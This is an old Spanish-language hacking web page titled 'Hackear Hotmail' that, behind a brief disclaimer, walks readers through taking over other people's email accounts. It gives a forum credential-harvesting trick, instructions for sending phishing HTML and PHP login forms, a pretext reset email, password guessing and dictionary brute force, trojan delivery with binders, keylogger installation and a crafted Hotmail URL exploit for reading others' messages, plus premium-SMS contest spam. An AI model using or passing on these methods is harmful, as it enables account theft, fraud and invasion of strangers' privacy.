Nickname
A Chatear seguro hay alguien conectado
usuarios.lycos.es/unsafebytes/hackearhotmail.htm
Hackear Hotmail Correos Hotmail Hackear MSN Messenger y más
AVISO IMPORTANTE
Antes de nada tengo que decir que esta web no pretende enseñar cosas
ilegales, cada uno es responsable de sus propios actos y de lo que puede hacer
con esta información. Asi solo pretendo enseñar como se mueve
un hacker y que métodos emplea para hackear para asi poder defendernos.
Hackear hotmail
La informacion aqui expuesta sirve tambien para otros servidores de correo.
La técnica más utilizada es la ingenería social, por
eso la culpa no es de los servidores si no del propio usuario o tonto que
vamos a hackear. Si eres nuevo en esto es conveniente que sepas que cuando
lees algo sobre hackear hotmail, no se refiere a hackear el servidor, ya que
eso es imposible (bueno, hay quien es capaz de hackear el Pentágono,
pero ya estaríamos hablando de hacking muy avanzado).
___________________________________________________________________________________________________
Concursos:
TOSHIBA PIV 1700.Manda un mensaje al 5069 con el texto CONSEGUIR PORTATIL
Nokia 7650(con cámara) . Manda un mensaje al 5069 con el texto CONSEGUIR
NOKIA
Baja o encarga contarreembolso descargas de juegos pc
___________________________________________________________________________________________________
1ª Manera. de hackear hotmail--La del foro-- LEERLO BIEN; CON CALMA LEÑE
Es muy fácil y seguramente que alguna vez has picado. En los foros
algunas personas preguntan como hackear hotmail, bueno pues tú le pones
en la respuesta algo como esto:
Hotmail tiene un servicio en esta dirección [email protected]*
que te vuelve a decir tu contraseña si la pierdes.Para usar este servicio
tienes que enviar un e-mail a [email protected]* y como asunto,
el correo que quieres hackear. Luego en en mensaje escribe este código
(o otro parecido):
/cgibin/star?108&login=23n4j3&pass=AQUITUPASSWORD/login&access19%80s10eBrd/user&javascript=active&get=TU
CORREO&login=javascript/cgi/bin%0a/
ATENCION: tu no tienes que enviar ningún email a [email protected]
email debe ser tu dirección
Este código no vale para nada. Si has hecho esto alguna vez le has
enviado a un tío que tiene un e-mail que es [email protected]*
tu correo y tu contraseña. De este modo, lo que tienes que hacer tú,
es hacerte una cuenta de hotmail (o en otro servidor, depende si quieres hackear
hotmail, yahoo, lycos, gmail...) como [email protected], [email protected],
te_devuelvo_la_contraseñ[email protected], [email protected] u otro
que se te ocurra y publicar en un foro lo que he expuesto arriba en letra
cursiva o algo parecido de tu cosecha (logicamente deberás cambiar
el e-mail de [email protected] por el que tu has creado)
2ª Manera de hackear una cuenta de correo--Exploits--
Un exploit es un código html que simula un aviso de hotmail diciendo
que cambies de contraseña (por el motivo que sea) y que escribas tu
correo con tu clave en el. Total que al responder ese e-mail le envias al
tío que te lo mandó tú clave y dirección de correo..
Te pongo unos Exploits abajo. Lo que tienes que hacer (despues de descomprimirlos)
es doble click en él. Te aparece la apariencia del exploit. Si te gusta
vas a la barra de tareas- ver - código fuente y te aparece el block
de notas con un código. Donde pone "aqui tu correo" o simplemente,
aparezca un email (@hotmail) escribes tu correo. Luego copias el código
completo y lo pegas donde se escribe el mensaje de correo. Es importante que
tengas activada una casilla que permita el código html para que el
exloit se vea(de lo contrario, el destinatario o víctima solo verá
el código). En el asunto pones lo que creas que haga referencia al
Xploit (aviso de hotmail, por ejemplo) y lo envias. Para darle realismo intenta
enviarlo anonimamente. Para eso hay páginas en internet que envian
e-mails anónimos o con el subject que tu quieras. Tambien existen programas.
En la Superguía del hacker te explica cómo enviarlos a través
de telnet. Lo malo de enviar emails de esta forma es que suelen ir a la carpeta
de correo no deseado, por eso aconsejo crear un email tipo [email protected],
[email protected], [email protected] o otros parecidos e enviarlos
desde ahí, así te aseguras de que llegan.. A continuación
pongo unos exploits para hotmail: Exploit 1 Exploit 2 Exploit 3 Exploit 4
Exploit 5 Exploit 6 Exploit 7 Exploit 8 Exploit 9. Es .posible que alguno
no funcione por culpa de la caida de algún Smtp. Es recomedable que
busques nuevos exploits, incluso es fácil crearlos si sabes un poco
de htm, pues los servidores que ofrecen espacio web te dan la oportunidad
de hacer tus propios formularios. Los que realmente funcionan a la perfeción
son los de php, en los que te haces una cuenta con espacio web gratuito(intenta
que sea sin publicidad para no levantar sospechas), subes una página
con un formulario con las cajas de email y contraseña, el logo de hotmail,
y un poco de ingenieria social y listo, kien rellene ese formulario te envia
un correo a tu cuenta con su clave de aceso y su email
3ª Manera de hackear hotmail--Sin Exploits--
Le mandas un mensaje a [email protected] que es el fulano que quieres hackear,
por ejemplo. Estimado usuario de Hotmail [email protected] Lamentamos informarle
que hemos detectado insistentes ataques contra varias cuentas de correo entre
las cuales está su cuenta [email protected]. Los ataques usan el método
de prueba y error (hack-hack) para el cual son particularmente vulnerables
las claves que, como la suya, son palabras pronunciables. Es por eso que lo
alentamos a que con urgencia solicite una nueva clave de nuestro servidor
de password, escribiendo un mensaje vacío a [email protected].
Dentro de los próximos minutos recibirá una clave automáticamente
generada por nuestro KeyBot, y para asegurar que nadie más que el legítimo
usuario la conozca, usted mismo deberá cambiarla dentro de las 48 horas
siguientes. Lamentando los inconvenientes que pueda ocasionarle esta medida
de seguridad adicional, nos despedimos de usted asegurándole que estamos
esforzándonos al máximo para hacer de Hotmail un servidor de
correos seguro y confiable. Atentamente The Hotmail Team Luser, entonces envía
su mail a [email protected] y al poco tiempo recibe una respuesta: Gracias
por colaborar con nuestro esquema de seguridad. La clave que nuestro Keybot
ha generado automáticamente es: 4ky32zq1wp Por razones de seguridad,
la clave caducará indefectiblemente en 48 horas. Usted deberá
ingresar a su correo Hotmail antes del plazo estipulado y cambiar la clave
desde el menú Opciones. Gracias por hacer de Hotmail un lugar más
seguro The Hotmail Team. [email protected] es tu cuenta de hotmail.
En resumen, le escribes a un tipo que envie un e-mail para que cambie su contraseña,
te llega un mensaje en blanco y tu escribes la contraseña que kieras.
El la cambia y tu ya sabes su contraseña.
4ª Manera de hackear hotmail--Brute force (hack-hack, prueba y error)--
Si se tiene idea del nombre de: a) la mascota de la víctima, b) el
apodo que le dieron sus amigos reales, c) la calle, ciudad o región
donde vive, d) la fecha de cumpleaños, e) el nombre del novio/a , f)SU
MOVIL o el de su hermano, g) 123456 (es la contraseña mas utilizada,
un 5% la usan).. Vas probando haber si aciertas. Parece una tontería
pero puede funcionar y en un 10% o más de los casos funciona Este debe
de ser el método por el que debes de empezar, pues es el más
rápido, pero tampoco esteas toda la noche... Si se hace desde una consola
telnet (mail.hotmail.com:110) se puede automatizar el proceso poniendo un
hackeador que use un diccionario
5ª Manera de sacar contraseñas--Troyano--
Un día, [email protected] recibe en su cuenta un mail como este: "Hola
bonita, soy un tipo re-divertido, nos conocimos los otros dias en el chat...
te envío unas fotos mías, ese que surfea en la cresta de la
ola soy yo, en las playas de Australia, salí segundo en el campeonato
mundial de 1999 en Perth. Como es un slide-show con 4 imágenes, va
todo compactado en un .exe por favor escanealo antes de correrlo porque uno
nunca sabe qué puede pasar con un archivo EXE mientras está
en el servidor de correos. Ah, casi me olvido, mandame tu foto y dame tu ICQ.
Besos... [email protected]" Escanealo todo lo que quieras, Bonita, estoy
seguro que Peter tiene bien claro que de la manera en que armó el paquete
ningún antivirus ni antitroyano lo detecta. Luego se sentará
a esperar que lo ejecutes, el troyano puede enviarle un mail avisándole
que Bonita ha sido infectada (para ello debe contar con un plug-in como el
ButtTrumpet instalado en el servidor de BackOrifice, por ejemplo). Una vez
que el troyano está instalado, Peter tiene casi total control sobre
el host que Bonita usa para conectarse, puede loggear las teclas apretadas,
puede ver los password que estén almacenados, reiniciar Windows, cambiar
claves en el Registry, lo que se le ocurra, incluyendo averiguar los pares
username-password de todas las cuentas a las que la víctima acceda.
O si no no te compliques la vida, mandale un troyano por messenger para despistar
utiliza un binder para poder juntar un archivo(un juego, fotos...) al server
del troyano y no levantar sospechas. Pásate por la sección troyanos
donde te explicamos mejor su funcionamiento
6ª Manera. Conociendo sus datos. (aun no la probe, pero doy gracias a
BrEaKeR_BoY por ponerlo en el foro)
Existe un correohotmail que te ayuda si perdiste tu contraseña <[email protected]>
Y TE PIDE LOS SIQUIENTES DATOS:
Nombre y apellidos
- Nombre de inicio de sesión (de la cuenta con la que está teniendo
problemas)
- Fecha de nacimiento (Día/mes/año)
- País o región
- Provincia o estado
- Código postal
- Fecha aproximada de la última vez que pudo iniciar sesión
sin problemas
- Fecha aproximada del registro de la cuenta
- Una lista con todas las contraseñas antiguas de esta cuenta que pueda
recordar
- Una lista con todos los contactos que recuerde
- El nombre de su proveedor de servicios Internet. Si tiene acceso a la cuenta
desde fuera de casa (por ejemplo, desde un centro de estudios o el trabajo),
incluya el nombre de la organización.
Si las respondes mas o menos bien te devolveran tu password (o el de la victima
jeje)
7ª Manera de conseguir un password--usando su ordenador--
Si tienes aceso a su ordenador le instalas un keylogger (en los cibers te
haces con muchas cuentas) y despues de que escriba su contraseña pues
te queda registrado todo lo que tecleo en un archivo. Hay keyloggers que incluso
te envian el archivo atu cuenta de correo. Tambien si esta para que se inicie
automaticamente programas como openpass.exe te rebelan lo que se oculta debajo
de los asteriscos.
7ª Manera de entrar en una cuenta de correo--Aprovechandouna vulnerabilidad,
agujero o bug. exploit--
Este exploit de root-core (http://www.root-core.com/) permite ver
ciertos mensajes de cuentas de correo de hotmail conociendo
el nombre de usuario.
Tres Pasos para ver algunos correos en Hotmail
(Probado con Internet Explorer 5)
Para ver completamente un mensaje de alguna cuenta de hotmail hay que
hacer lo siguiente:
1. Acceder a Hotmail normalmente con tu nombre de usuario o con
cualquier otro que conozcas.
2. Utiliza un link como este para ver un mensaje específico de un
usuario específico:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%
3d9999999999999999%26raw%3d0%26login%3dusername%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com
o bien:
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%
3d9999999999999999%26raw%3d0%26login%3dusername%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com
De ese link cambia los siguientes valores:
MSG943322803%2e16 (Número de mensaje, es símplemente un
contador. %2e
equivale a "." )
username (El nombre de usuario de la cuenta de correo que
quieras espiar)
Ejemplos de números de mensaje:
MSG943322803%2e1
MSG943322803%2e22
MSG943322803%2e149
(borra "%26raw%3d0" si quieres ver el correo como una ventana normal
de hotmail en lugar de ver el mensaje como texto sin formato)
(borra "&hm___fl=attrd&domain=hotmail.com" si no quieres
que aparezca
el frame superior de hotmail)
Nota. Todo lo parecido a "%2e", etc. son códigos ascii
hexadecimal.
Debes utilizarlos en lugar de los caracteres normales.
Aquí tienes una lista completa:
http://www.december.com/html/spec/ascii.html
3.
Ya está. Si introduces un número de mensaje correcto puedes
leer ese determinado mensaje (siempre que exista ese mensaje claro :)
(Comprueba el método antes con tus propios mensajes en hotmail
para saber como funciona).
Como teclear cada vez un número de mensaje es un trabajo bastante
pesado, los chicos de root core han creado una pequeña utilidad
para escanear automáticamente un rango de mensajes de un usuario
específico.
La puedes bajar aquí: http://rootcore.can-host.
com/files/hobo04r2.zip
Para ver los mensajes necesitas trabajar con IExplorer y debes haber
entrado previamente en tu cuenta de Hotmail.
Prueba el fallo en estos links de prueba:
(1. Entra en tu cuenta de hotmail, 2. Copia estos links y pruebalos
en tu navegador)
Ejemplo texto sin formato (no se pueden ver los attach directamente)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%
3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%
3djokutesti99%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com
ventana del buzón normal: (puedes ver imágenes, etc. )
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%
3d9687%26disk%3d64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26domain%
3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
Puedes ver también mensajes eliminados. Si borras un mensaje en
hotmail y después vacías la papelera, el mensaje es visible
usando este tipo de link durante unas 6-12 horas aproximadamente.
Correcciones y más cosas:
Cambios en el link:
Eliminar parámetro: %26disk%3d64%2e4%2e36%2e68_d1577
Este parámetro causa un error en algunos casos: "Due to an
internal error your request cannot be processed. We apologize for the
inconvenience. Please try again later."
Solución. Eliminar este parámetro del link, no es necesario.
Cambios en los parámetros: %26start%3d9702%26len%3d9687 en lugar
de %26start%3d1%26len%3d9999999999999999
Este parámetro determina justo el comienzo y la longitud
visualizable del email. Si pones el valor demasiado pequeño el
email
se verá justo ese número de carácteres.
Si el usuario no tiene ese mensaje en su buzón, se obtiene este
mensaje de error:
" Subject: Unable to locate message Content-Type: text/plain;
charset=us-ascii An error has prevented from locating the message."
Si el usuario no existe, se obtiene una página completamente en
blanco.
Si existe algún error en la sintaxis del link normalmente
aparecerá la página de acceso de hotmail pidiendo de nuevo el
password.
Si tienes dificultades para ver mensajes comprueba que has
introducido correctamente el número de mensaje.
(MSGXXXXXXXXX.YYY)
El valor Y puede ser oscilar entre 0-nnn. nnn puede ser lo que sea,
dependiendo del número de mensajes en ese buzón. 100, 200, etc.
Comprueba que la sintaxis del link es correcta.
Comprueba que has entrado en tu cuenta de Hotmail.
Prueba a cambiar el servidor. En lugar de pv2fd.pav2.hotmail ,
intentalo con lw14fd.law14.hotmail.
Si los links de prueba de Root Core ya no son operativos, sin duda es
debido a que hotmail ya ha solucionado el problema.
